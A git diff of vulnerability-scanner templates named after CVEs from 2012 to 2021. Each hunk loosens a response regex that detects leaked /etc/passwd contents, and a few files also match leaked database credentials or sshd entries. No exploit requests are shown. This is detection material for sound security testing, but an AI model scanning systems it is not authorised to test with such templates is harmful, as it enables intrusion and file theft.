1d71ce7da7..f2f74f08b9 100644 --- a/cves/2012/CVE-2012-1823.yaml +++ b/cves/2012/CVE-2012-1823.yaml @@ -27,7 +27,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" condition: and - type: status diff --git a/cves/2013/CVE-2013-1965.yaml b/cves/2013/CVE-2013-1965.yaml index fcfc281443..5539dfc559 100644 --- a/cves/2013/CVE-2013-1965.yaml +++ b/cves/2013/CVE-2013-1965.yaml @@ -22,7 +22,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" - type: status status: diff --git a/cves/2013/CVE-2013-5528.yaml b/cves/2013/CVE-2013-5528.yaml index 004272bf5c..aae2a740e1 100644 --- a/cves/2013/CVE-2013-5528.yaml +++ b/cves/2013/CVE-2013-5528.yaml @@ -18,7 +18,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" - type: status status: diff --git a/cves/2014/CVE-2014-3120.yaml b/cves/2014/CVE-2014-3120.yaml index 96b6e0fc3a..fce21f4bbb 100644 --- a/cves/2014/CVE-2014-3120.yaml +++ b/cves/2014/CVE-2014-3120.yaml @@ -49,7 +49,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" part: body - type: status diff --git a/cves/2014/CVE-2014-3744.yaml b/cves/2014/CVE-2014-3744.yaml index fb9a56ce08..87d35bcd02 100644 --- a/cves/2014/CVE-2014-3744.yaml +++ b/cves/2014/CVE-2014-3744.yaml @@ -22,4 +22,4 @@ requests: - 200 - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" diff --git a/cves/2014/CVE-2014-6271.yaml b/cves/2014/CVE-2014-6271.yaml index 4c9961dac7..df10f8f96c 100644 --- a/cves/2014/CVE-2014-6271.yaml +++ b/cves/2014/CVE-2014-6271.yaml @@ -32,5 +32,5 @@ requests: - 200 - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" part: body diff --git a/cves/2015/CVE-2015-1000012.yaml b/cves/2015/CVE-2015-1000012.yaml index eb9030aeb7..2bb09f1aa2 100644 --- a/cves/2015/CVE-2015-1000012.yaml +++ b/cves/2015/CVE-2015-1000012.yaml @@ -18,7 +18,7 @@ requests: matchers: - type: regex regex: - - "root:[0*]:0:0" + - "root:.*:0:0" part: body - type: status status: diff --git a/cves/2015/CVE-2015-1427.yaml b/cves/2015/CVE-2015-1427.yaml index 9412b721fb..bbaf08003e 100644 --- a/cves/2015/CVE-2015-1427.yaml +++ b/cves/2015/CVE-2015-1427.yaml @@ -46,7 +46,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" part: body - type: status diff --git a/cves/2015/CVE-2015-3337.yaml b/cves/2015/CVE-2015-3337.yaml index a63020f1d0..8b3acdf235 100644 --- a/cves/2015/CVE-2015-3337.yaml +++ b/cves/2015/CVE-2015-3337.yaml @@ -17,7 +17,7 @@ requests: matchers: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" part: body - type: status diff --git a/cves/2015/CVE-2015-5688.yaml b/cves/2015/CVE-2015-5688.yaml index 3f9caf1e13..7c27e591c1 100644 --- a/cves/2015/CVE-2015-5688.yaml +++ b/cves/2015/CVE-2015-5688.yaml @@ -18,7 +18,7 @@ requests: matchers: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" part: body - type: status diff --git a/cves/2015/CVE-2015-9480.yaml b/cves/2015/CVE-2015-9480.yaml index 92c272b706..50e1fb1f8c 100644 --- a/cves/2015/CVE-2015-9480.yaml +++ b/cves/2015/CVE-2015-9480.yaml @@ -18,7 +18,7 @@ requests: matchers: - type: regex regex: - - "root:[0*]:0:0" + - "root:.*:0:0" part: body - type: status status: diff --git a/cves/2016/CVE-2016-10956.yaml b/cves/2016/CVE-2016-10956.yaml index b59c24dc22..35d01b2f9d 100644 --- a/cves/2016/CVE-2016-10956.yaml +++ b/cves/2016/CVE-2016-10956.yaml @@ -18,7 +18,7 @@ requests: matchers: - type: regex regex: - - "root:[0*]:0:0" + - "root:.*:0:0" part: body - type: status status: diff --git a/cves/2016/CVE-2016-3081.yaml b/cves/2016/CVE-2016-3081.yaml index f81217e459..420fa7a5d4 100644 --- a/cves/2016/CVE-2016-3081.yaml +++ b/cves/2016/CVE-2016-3081.yaml @@ -25,4 +25,4 @@ requests: - 200 - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" diff --git a/cves/2017/CVE-2017-10271.yaml b/cves/2017/CVE-2017-10271.yaml index 5a4a5c32f7..f9456e6b9f 100644 --- a/cves/2017/CVE-2017-10271.yaml +++ b/cves/2017/CVE-2017-10271.yaml @@ -63,5 +63,5 @@ requests: matchers: - type: regex regex: - - 'root:[x*]:0:0' + - 'root:.*:0:0' part: body diff --git a/cves/2017/CVE-2017-12611.yaml b/cves/2017/CVE-2017-12611.yaml index 274485205b..ae2639eebb 100644 --- a/cves/2017/CVE-2017-12611.yaml +++ b/cves/2017/CVE-2017-12611.yaml @@ -18,7 +18,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" - type: status status: diff --git a/cves/2017/CVE-2017-12615.yaml b/cves/2017/CVE-2017-12615.yaml index e8a95d4f9b..047b8cede3 100644 --- a/cves/2017/CVE-2017-12615.yaml +++ b/cves/2017/CVE-2017-12615.yaml @@ -43,7 +43,7 @@ requests: matchers: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" part: body - type: status status: diff --git a/cves/2017/CVE-2017-14535.yaml b/cves/2017/CVE-2017-14535.yaml index f72453f16f..c4e46b6c4c 100644 --- a/cves/2017/CVE-2017-14535.yaml +++ b/cves/2017/CVE-2017-14535.yaml @@ -25,7 +25,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" - type: status status: diff --git a/cves/2017/CVE-2017-14537.yaml b/cves/2017/CVE-2017-14537.yaml index d4f40bcb2b..784f327ae2 100644 --- a/cves/2017/CVE-2017-14537.yaml +++ b/cves/2017/CVE-2017-14537.yaml @@ -47,5 +47,5 @@ requests: - 200 - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" part: body diff --git a/cves/2017/CVE-2017-14849.yaml b/cves/2017/CVE-2017-14849.yaml index a6fe2a3244..184da5d96f 100644 --- a/cves/2017/CVE-2017-14849.yaml +++ b/cves/2017/CVE-2017-14849.yaml @@ -18,5 +18,5 @@ requests: - 200 - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" part: body diff --git a/cves/2017/CVE-2017-16806.yaml b/cves/2017/CVE-2017-16806.yaml index 159b0732f8..b49f7913cd 100644 --- a/cves/2017/CVE-2017-16806.yaml +++ b/cves/2017/CVE-2017-16806.yaml @@ -20,7 +20,7 @@ requests: - 200 - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" - "\\[(font|extension|file)s\\]" conditon: or part: body diff --git a/cves/2017/CVE-2017-16877.yaml b/cves/2017/CVE-2017-16877.yaml index ea73d4b0f1..6af9898153 100644 --- a/cves/2017/CVE-2017-16877.yaml +++ b/cves/2017/CVE-2017-16877.yaml @@ -18,7 +18,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" part: body condition: and diff --git a/cves/2017/CVE-2017-9791.yaml b/cves/2017/CVE-2017-9791.yaml index 824467240e..a1bd926d69 100644 --- a/cves/2017/CVE-2017-9791.yaml +++ b/cves/2017/CVE-2017-9791.yaml @@ -28,7 +28,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" condition: and - type: status diff --git a/cves/2018/CVE-2018-11776.yaml b/cves/2018/CVE-2018-11776.yaml index d950fe18c8..ef2fb19d90 100644 --- a/cves/2018/CVE-2018-11776.yaml +++ b/cves/2018/CVE-2018-11776.yaml @@ -17,7 +17,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" - type: status status: diff --git a/cves/2018/CVE-2018-12031.yaml b/cves/2018/CVE-2018-12031.yaml index 0fc4b182f1..24dd662bf2 100644 --- a/cves/2018/CVE-2018-12031.yaml +++ b/cves/2018/CVE-2018-12031.yaml @@ -21,7 +21,7 @@ requests: matchers: - type: regex regex: - - "root:[0*]:0:0" + - "root:.*:0:0" - "\\[(font|extension|file)s\\]" condition: or part: body diff --git a/cves/2018/CVE-2018-12613.yaml b/cves/2018/CVE-2018-12613.yaml index d9db64353f..59af7e6d53 100644 --- a/cves/2018/CVE-2018-12613.yaml +++ b/cves/2018/CVE-2018-12613.yaml @@ -17,7 +17,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" part: body - type: status diff --git a/cves/2018/CVE-2018-1273.yaml b/cves/2018/CVE-2018-1273.yaml index 7504e05ef9..6094adff33 100644 --- a/cves/2018/CVE-2018-1273.yaml +++ b/cves/2018/CVE-2018-1273.yaml @@ -30,7 +30,7 @@ requests: matchers: - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" - "\\[(font|extension|file)s\\]" condition: or part: body diff --git a/cves/2018/CVE-2018-14728.yaml b/cves/2018/CVE-2018-14728.yaml index 87e950fe60..09d221c05a 100644 --- a/cves/2018/CVE-2018-14728.yaml +++ b/cves/2018/CVE-2018-14728.yaml @@ -16,5 +16,5 @@ requests: matchers: - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" part: body diff --git a/cves/2018/CVE-2018-16059.yaml b/cves/2018/CVE-2018-16059.yaml index d907c47ceb..9ec5c71e7c 100644 --- a/cves/2018/CVE-2018-16059.yaml +++ b/cves/2018/CVE-2018-16059.yaml @@ -19,7 +19,7 @@ requests: matchers: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" part: body - type: status diff --git a/cves/2018/CVE-2018-16283.yaml b/cves/2018/CVE-2018-16283.yaml index 72d62b3cdf..d7d843e8c3 100644 --- a/cves/2018/CVE-2018-16283.yaml +++ b/cves/2018/CVE-2018-16283.yaml @@ -17,5 +17,5 @@ requests: matchers: - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" part: body diff --git a/cves/2018/CVE-2018-16299.yaml b/cves/2018/CVE-2018-16299.yaml index 4e6d0331b4..f14b9a2c99 100644 --- a/cves/2018/CVE-2018-16299.yaml +++ b/cves/2018/CVE-2018-16299.yaml @@ -17,7 +17,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" - type: status status: diff --git a/cves/2018/CVE-2018-16763.yaml b/cves/2018/CVE-2018-16763.yaml index a268eb5ad9..0f46ced01e 100644 --- a/cves/2018/CVE-2018-16763.yaml +++ b/cves/2018/CVE-2018-16763.yaml @@ -24,4 +24,4 @@ requests: - 200 - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" diff --git a/cves/2018/CVE-2018-16836.yaml b/cves/2018/CVE-2018-16836.yaml index aba35a9c31..f0d316da1c 100644 --- a/cves/2018/CVE-2018-16836.yaml +++ b/cves/2018/CVE-2018-16836.yaml @@ -16,7 +16,7 @@ requests: matchers: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" - type: status status: diff --git a/cves/2018/CVE-2018-18777.yaml b/cves/2018/CVE-2018-18777.yaml index ca48a4b0e2..57a3a8d4e7 100644 --- a/cves/2018/CVE-2018-18777.yaml +++ b/cves/2018/CVE-2018-18777.yaml @@ -17,7 +17,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" - type: status status: diff --git a/cves/2018/CVE-2018-18778.yaml b/cves/2018/CVE-2018-18778.yaml index eb51a2af83..e6423cda4b 100644 --- a/cves/2018/CVE-2018-18778.yaml +++ b/cves/2018/CVE-2018-18778.yaml @@ -23,4 +23,4 @@ requests: - 200 - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" diff --git a/cves/2018/CVE-2018-3714.yaml b/cves/2018/CVE-2018-3714.yaml index ae96f93c34..27ef1d003f 100644 --- a/cves/2018/CVE-2018-3714.yaml +++ b/cves/2018/CVE-2018-3714.yaml @@ -17,5 +17,5 @@ requests: - 200 - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" part: body diff --git a/cves/2018/CVE-2018-3760.yaml b/cves/2018/CVE-2018-3760.yaml index ff39f6696f..ebcd97e3ef 100644 --- a/cves/2018/CVE-2018-3760.yaml +++ b/cves/2018/CVE-2018-3760.yaml @@ -39,7 +39,7 @@ requests: matchers: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" - type: status status: diff --git a/cves/2018/CVE-2018-7422.yaml b/cves/2018/CVE-2018-7422.yaml index 6aa32d6c87..8cb678bdfd 100644 --- a/cves/2018/CVE-2018-7422.yaml +++ b/cves/2018/CVE-2018-7422.yaml @@ -25,5 +25,5 @@ requests: - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" part: body \ No newline at end of file diff --git a/cves/2018/CVE-2018-7490.yaml b/cves/2018/CVE-2018-7490.yaml index 80cf68a654..a2cb244508 100644 --- a/cves/2018/CVE-2018-7490.yaml +++ b/cves/2018/CVE-2018-7490.yaml @@ -18,5 +18,5 @@ requests: - 200 - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" part: body diff --git a/cves/2018/CVE-2018-7600.yaml b/cves/2018/CVE-2018-7600.yaml index 80016ff4bd..a92638e44f 100644 --- a/cves/2018/CVE-2018-7600.yaml +++ b/cves/2018/CVE-2018-7600.yaml @@ -49,7 +49,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" part: body - type: status diff --git a/cves/2018/CVE-2018-8033.yaml b/cves/2018/CVE-2018-8033.yaml index 6037285021..8904dd11ea 100644 --- a/cves/2018/CVE-2018-8033.yaml +++ b/cves/2018/CVE-2018-8033.yaml @@ -22,7 +22,7 @@ requests: matchers: - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" part: body - type: status status: diff --git a/cves/2019/CVE-2019-11510.yaml b/cves/2019/CVE-2019-11510.yaml index c0a3e74ccd..7effbabf9b 100644 --- a/cves/2019/CVE-2019-11510.yaml +++ b/cves/2019/CVE-2019-11510.yaml @@ -18,5 +18,5 @@ requests: - 200 - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" part: body diff --git a/cves/2019/CVE-2019-12314.yaml b/cves/2019/CVE-2019-12314.yaml index 613a0623b5..3331e32b9d 100644 --- a/cves/2019/CVE-2019-12314.yaml +++ b/cves/2019/CVE-2019-12314.yaml @@ -22,5 +22,5 @@ requests: - 200 - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" part: body diff --git a/cves/2019/CVE-2019-15107.yaml b/cves/2019/CVE-2019-15107.yaml index cb0c10f5c3..4bea33bbe8 100644 --- a/cves/2019/CVE-2019-15107.yaml +++ b/cves/2019/CVE-2019-15107.yaml @@ -28,4 +28,4 @@ requests: matchers: - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" diff --git a/cves/2019/CVE-2019-16278.yaml b/cves/2019/CVE-2019-16278.yaml index cf0394b132..4628e2aa48 100644 --- a/cves/2019/CVE-2019-16278.yaml +++ b/cves/2019/CVE-2019-16278.yaml @@ -23,4 +23,4 @@ requests: matchers: - type: regex regex: - - "root:[x*]:0:0:" \ No newline at end of file + - "root:.*:0:0:" \ No newline at end of file diff --git a/cves/2019/CVE-2019-16662.yaml b/cves/2019/CVE-2019-16662.yaml index f077112ea8..592bff2265 100644 --- a/cves/2019/CVE-2019-16662.yaml +++ b/cves/2019/CVE-2019-16662.yaml @@ -19,4 +19,4 @@ requests: - 200 - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" diff --git a/cves/2019/CVE-2019-16920.yaml b/cves/2019/CVE-2019-16920.yaml index 8d608fa939..5548784290 100644 --- a/cves/2019/CVE-2019-16920.yaml +++ b/cves/2019/CVE-2019-16920.yaml @@ -52,7 +52,7 @@ requests: matchers: - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" - "\\[(font|extension|file)s\\]" condition: or part: body diff --git a/cves/2019/CVE-2019-17270.yaml b/cves/2019/CVE-2019-17270.yaml index ad6ff8aa88..accc60e1f2 100644 --- a/cves/2019/CVE-2019-17270.yaml +++ b/cves/2019/CVE-2019-17270.yaml @@ -21,7 +21,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" condition: and - type: status diff --git a/cves/2019/CVE-2019-17538.yaml b/cves/2019/CVE-2019-17538.yaml index 0352963436..4051eaaa7e 100644 --- a/cves/2019/CVE-2019-17538.yaml +++ b/cves/2019/CVE-2019-17538.yaml @@ -19,5 +19,5 @@ requests: - 200 - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" part: body diff --git a/cves/2019/CVE-2019-3799.yaml b/cves/2019/CVE-2019-3799.yaml index 9f929cf2c3..c750c7c3fa 100644 --- a/cves/2019/CVE-2019-3799.yaml +++ b/cves/2019/CVE-2019-3799.yaml @@ -20,5 +20,5 @@ requests: - 200 - type: regex regex: - - 'root:[x*]:0:0:' + - 'root:.*:0:0:' part: body diff --git a/cves/2019/CVE-2019-5418.yaml b/cves/2019/CVE-2019-5418.yaml index 88e53da066..03d93ee30a 100644 --- a/cves/2019/CVE-2019-5418.yaml +++ b/cves/2019/CVE-2019-5418.yaml @@ -23,5 +23,5 @@ requests: - 200 - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" part: body diff --git a/cves/2019/CVE-2019-7254.yaml b/cves/2019/CVE-2019-7254.yaml index db8efe55ac..1cf467a83d 100644 --- a/cves/2019/CVE-2019-7254.yaml +++ b/cves/2019/CVE-2019-7254.yaml @@ -18,7 +18,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" - type: status status: diff --git a/cves/2019/CVE-2019-7256.yaml b/cves/2019/CVE-2019-7256.yaml index 4c7aea8765..d5fb7ff1cf 100644 --- a/cves/2019/CVE-2019-7256.yaml +++ b/cves/2019/CVE-2019-7256.yaml @@ -39,4 +39,4 @@ requests: - 200 - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" diff --git a/cves/2019/CVE-2019-8982.yaml b/cves/2019/CVE-2019-8982.yaml index a7382d5b0f..8af7a5e681 100644 --- a/cves/2019/CVE-2019-8982.yaml +++ b/cves/2019/CVE-2019-8982.yaml @@ -18,5 +18,5 @@ requests: - 200 - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" part: body diff --git a/cves/2019/CVE-2019-9618.yaml b/cves/2019/CVE-2019-9618.yaml index a04b19cf92..5ed8f7c7f0 100644 --- a/cves/2019/CVE-2019-9618.yaml +++ b/cves/2019/CVE-2019-9618.yaml @@ -20,7 +20,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" - type: status status: diff --git a/cves/2019/CVE-2019-9670.yaml b/cves/2019/CVE-2019-9670.yaml index 5785af71d4..fcb6483f59 100644 --- a/cves/2019/CVE-2019-9670.yaml +++ b/cves/2019/CVE-2019-9670.yaml @@ -28,5 +28,5 @@ requests: matchers: - type: regex regex: - - 'root:[x*]:0:0' + - 'root:.*:0:0' part: body diff --git a/cves/2020/CVE-2020-11738.yaml b/cves/2020/CVE-2020-11738.yaml index 233f661e5c..cfbb12b802 100644 --- a/cves/2020/CVE-2020-11738.yaml +++ b/cves/2020/CVE-2020-11738.yaml @@ -33,7 +33,7 @@ requests: part: header - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" - "define\\('DB_(NAME|USER|PASSWORD|HOST|CHARSET|COLLATE)'" condition: or part: body \ No newline at end of file diff --git a/cves/2020/CVE-2020-11991.yaml b/cves/2020/CVE-2020-11991.yaml index 2590d89ea4..18f07c95ee 100644 --- a/cves/2020/CVE-2020-11991.yaml +++ b/cves/2020/CVE-2020-11991.yaml @@ -28,7 +28,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" - type: status status: diff --git a/cves/2020/CVE-2020-14864.yaml b/cves/2020/CVE-2020-14864.yaml index 18080dce93..edd398ebf6 100644 --- a/cves/2020/CVE-2020-14864.yaml +++ b/cves/2020/CVE-2020-14864.yaml @@ -23,5 +23,5 @@ requests: - 200 - type: regex regex: - - 'root:[x*]:0:0' + - 'root:.*:0:0' part: body \ No newline at end of file diff --git a/cves/2020/CVE-2020-14882.yaml b/cves/2020/CVE-2020-14882.yaml index f29fdf8c55..4c2e370aa0 100644 --- a/cves/2020/CVE-2020-14882.yaml +++ b/cves/2020/CVE-2020-14882.yaml @@ -37,7 +37,7 @@ requests: matchers: - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" - "\\[(font|extension|file)s\\]" condition: or part: body diff --git a/cves/2020/CVE-2020-14883.yaml b/cves/2020/CVE-2020-14883.yaml index 5967b09851..dbb81a9dd2 100644 --- a/cves/2020/CVE-2020-14883.yaml +++ b/cves/2020/CVE-2020-14883.yaml @@ -24,7 +24,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" condition: and - type: status diff --git a/cves/2020/CVE-2020-15227.yaml b/cves/2020/CVE-2020-15227.yaml index 396ad6ba9c..75ab77e69a 100644 --- a/cves/2020/CVE-2020-15227.yaml +++ b/cves/2020/CVE-2020-15227.yaml @@ -22,7 +22,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" - type: status status: diff --git a/cves/2020/CVE-2020-15568.yaml b/cves/2020/CVE-2020-15568.yaml index 382b67890b..c9408d639e 100644 --- a/cves/2020/CVE-2020-15568.yaml +++ b/cves/2020/CVE-2020-15568.yaml @@ -26,7 +26,7 @@ requests: matchers: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" part: body - type: status status: diff --git a/cves/2020/CVE-2020-15920.yaml b/cves/2020/CVE-2020-15920.yaml index c4fb819067..e0457058b0 100644 --- a/cves/2020/CVE-2020-15920.yaml +++ b/cves/2020/CVE-2020-15920.yaml @@ -19,5 +19,5 @@ requests: - 200 - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" part: body diff --git a/cves/2020/CVE-2020-17496.yaml b/cves/2020/CVE-2020-17496.yaml index 2bbd70c984..bbcd6072f2 100644 --- a/cves/2020/CVE-2020-17496.yaml +++ b/cves/2020/CVE-2020-17496.yaml @@ -20,7 +20,7 @@ requests: matchers: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" - type: status status: diff --git a/cves/2020/CVE-2020-17519.yaml b/cves/2020/CVE-2020-17519.yaml index 3a20497453..f1c9a162b0 100644 --- a/cves/2020/CVE-2020-17519.yaml +++ b/cves/2020/CVE-2020-17519.yaml @@ -19,5 +19,5 @@ requests: - 200 - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" part: body diff --git a/cves/2020/CVE-2020-17530.yaml b/cves/2020/CVE-2020-17530.yaml index 68a7a790d7..9c4507b2fa 100644 --- a/cves/2020/CVE-2020-17530.yaml +++ b/cves/2020/CVE-2020-17530.yaml @@ -22,5 +22,5 @@ requests: matchers: - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" part: body diff --git a/cves/2020/CVE-2020-21224.yaml b/cves/2020/CVE-2020-21224.yaml index af595d18ab..1e84564e2d 100644 --- a/cves/2020/CVE-2020-21224.yaml +++ b/cves/2020/CVE-2020-21224.yaml @@ -24,7 +24,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" part: body - type: status diff --git a/cves/2020/CVE-2020-24579.yaml b/cves/2020/CVE-2020-24579.yaml index 4a36d1073e..5f354d7712 100644 --- a/cves/2020/CVE-2020-24579.yaml +++ b/cves/2020/CVE-2020-24579.yaml @@ -44,5 +44,5 @@ requests: - type: regex regex: - "nobody:[x*]:65534:65534" - - "root:[x*]:0:0" + - "root:.*:0:0" condition: or diff --git a/cves/2020/CVE-2020-25540.yaml b/cves/2020/CVE-2020-25540.yaml index c378bd4286..92402a073f 100644 --- a/cves/2020/CVE-2020-25540.yaml +++ b/cves/2020/CVE-2020-25540.yaml @@ -20,4 +20,4 @@ requests: - 200 - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" diff --git a/cves/2020/CVE-2020-26073.yaml b/cves/2020/CVE-2020-26073.yaml index 10d7aac230..cb775c813c 100644 --- a/cves/2020/CVE-2020-26073.yaml +++ b/cves/2020/CVE-2020-26073.yaml @@ -20,5 +20,5 @@ requests: - 200 - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" part: body diff --git a/cves/2020/CVE-2020-29227.yaml b/cves/2020/CVE-2020-29227.yaml index 0dbfe41285..843afecf33 100644 --- a/cves/2020/CVE-2020-29227.yaml +++ b/cves/2020/CVE-2020-29227.yaml @@ -18,7 +18,7 @@ requests: matchers: - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" part: body - type: status status: diff --git a/cves/2020/CVE-2020-35736.yaml b/cves/2020/CVE-2020-35736.yaml index ef1f03d2b5..0a2da783b9 100644 --- a/cves/2020/CVE-2020-35736.yaml +++ b/cves/2020/CVE-2020-35736.yaml @@ -19,7 +19,7 @@ requests: matchers: - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" - type: status status: diff --git a/cves/2020/CVE-2020-5405.yaml b/cves/2020/CVE-2020-5405.yaml index 0bc12c060b..a103e34d12 100644 --- a/cves/2020/CVE-2020-5405.yaml +++ b/cves/2020/CVE-2020-5405.yaml @@ -19,5 +19,5 @@ requests: - 200 - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" part: body diff --git a/cves/2020/CVE-2020-5410.yaml b/cves/2020/CVE-2020-5410.yaml index c6da0400a6..773e721bae 100644 --- a/cves/2020/CVE-2020-5410.yaml +++ b/cves/2020/CVE-2020-5410.yaml @@ -19,5 +19,5 @@ requests: - 200 - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" part: body diff --git a/cves/2020/CVE-2020-5902.yaml b/cves/2020/CVE-2020-5902.yaml index 362ad7195a..cfc759516e 100644 --- a/cves/2020/CVE-2020-5902.yaml +++ b/cves/2020/CVE-2020-5902.yaml @@ -33,7 +33,7 @@ requests: - 200 - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" - "BIG-IP release ([\\d.]+)" - "[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{7}" - "HSQL Database Engine Servlet" diff --git a/cves/2020/CVE-2020-7209.yaml b/cves/2020/CVE-2020-7209.yaml index cce3b93c7a..74841a4ce3 100644 --- a/cves/2020/CVE-2020-7209.yaml +++ b/cves/2020/CVE-2020-7209.yaml @@ -27,5 +27,5 @@ requests: matchers: - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" part: body diff --git a/cves/2020/CVE-2020-8163.yaml b/cves/2020/CVE-2020-8163.yaml index ea48d877d8..396f4c1b06 100644 --- a/cves/2020/CVE-2020-8163.yaml +++ b/cves/2020/CVE-2020-8163.yaml @@ -19,5 +19,5 @@ requests: - 200 - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" part: body diff --git a/cves/2020/CVE-2020-8193.yaml b/cves/2020/CVE-2020-8193.yaml index 8c30d3a2e5..3ff654e589 100644 --- a/cves/2020/CVE-2020-8193.yaml +++ b/cves/2020/CVE-2020-8193.yaml @@ -87,5 +87,5 @@ requests: matchers: - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" part: body \ No newline at end of file diff --git a/cves/2020/CVE-2020-8209.yaml b/cves/2020/CVE-2020-8209.yaml index 1d6b826365..ab58540906 100644 --- a/cves/2020/CVE-2020-8209.yaml +++ b/cves/2020/CVE-2020-8209.yaml @@ -21,7 +21,7 @@ requests: matchers: - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" part: body - type: word words: diff --git a/cves/2020/CVE-2020-8515.yaml b/cves/2020/CVE-2020-8515.yaml index 30404cf527..21148d4956 100644 --- a/cves/2020/CVE-2020-8515.yaml +++ b/cves/2020/CVE-2020-8515.yaml @@ -25,7 +25,7 @@ requests: matchers: - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" part: body - type: status diff --git a/cves/2020/CVE-2020-9054.yaml b/cves/2020/CVE-2020-9054.yaml index a024db7a2c..34d1904962 100644 --- a/cves/2020/CVE-2020-9054.yaml +++ b/cves/2020/CVE-2020-9054.yaml @@ -32,4 +32,4 @@ requests: - 200 - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" diff --git a/cves/2021/CVE-2021-21234.yaml b/cves/2021/CVE-2021-21234.yaml index 35982b8a6c..d6e37c4243 100644 --- a/cves/2021/CVE-2021-21234.yaml +++ b/cves/2021/CVE-2021-21234.yaml @@ -17,7 +17,7 @@ requests: - type: regex part: body regex: - - "root:[x*]:0:0" + - "root:.*:0:0" - type: status status: diff --git a/cves/2021/CVE-2021-25646.yaml b/cves/2021/CVE-2021-25646.yaml index 726db1c2e9..a1128591fe 100644 --- a/cves/2021/CVE-2021-25646.yaml +++ b/cves/2021/CVE-2021-25646.yaml @@ -74,5 +74,5 @@ requests: - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" part: body diff --git a/cves/2021/CVE-2021-28149.yaml b/cves/2021/CVE-2021-28149.yaml index fe6e840041..e9f4040fdd 100644 --- a/cves/2021/CVE-2021-28149.yaml +++ b/cves/2021/CVE-2021-28149.yaml @@ -50,7 +50,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" - "sshd:[x*]" - "root:[$]" part: body diff --git 